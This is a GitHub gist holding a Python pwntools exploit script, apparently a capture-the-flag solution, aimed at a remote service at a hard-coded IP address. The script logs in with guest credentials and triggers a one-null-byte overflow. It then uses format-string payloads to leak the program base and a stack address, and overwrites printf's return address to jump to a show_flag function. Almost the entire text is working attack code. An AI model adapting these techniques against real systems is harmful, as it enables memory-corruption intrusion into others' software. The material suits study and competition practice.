Skip to content

Instantly share code, notes, and snippets.

@seanwupi
Created Mar 29, 2015
Embed
What would you like to do?
#!/usr/bin/env python
from pwn import * # pip install pwntools
r = remote('202.112.26.107', 10910)
# one null byte overflow
r.recvuntil('Login: ')
r.send('guest\n')
r.recvuntil('Password: ')
r.send('guest123\n')
r.recvuntil('Your choice: ')
r.send('2\n')
r.recvuntil('Enter your new username:\n')
r.send('A'*256 + '\n')
r.recvuntil('Your choice: ')
r.send('4\n')
# fmt1: leak program base, stack address
r.recvuntil('Login: ')
r.send('%lx %48$lx '+ '\n')
r.recvuntil('Password: ')
r.send('\n')
tt = r.recvuntil('login failed.').split()
code_base = int(tt[0], 16) - 0x1490
print 'bin =', hex(code_base)
buf = int(tt[1], 16) - 528
retaddr = buf - 24
print 'printf_ret@stack = ', hex(retaddr)
# fmt2: overwrite the return address from printf() to show_flag(). Only lowest 2 bytes needed
show_flag = 0xFB3 + code_base
fs = ('%%%dc%%10$hn' % (show_flag&0xffff)).ljust(16) + p64(retaddr)
r.recvuntil('Login: ')
r.send(fs + '\n')
r.recvuntil('Password: ')
r.send('\n')
# receive lots of whitespace ..
r.recvuntil(p64(retaddr)[:6])
# receive flag
print r.recvuntil('\n')
r.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment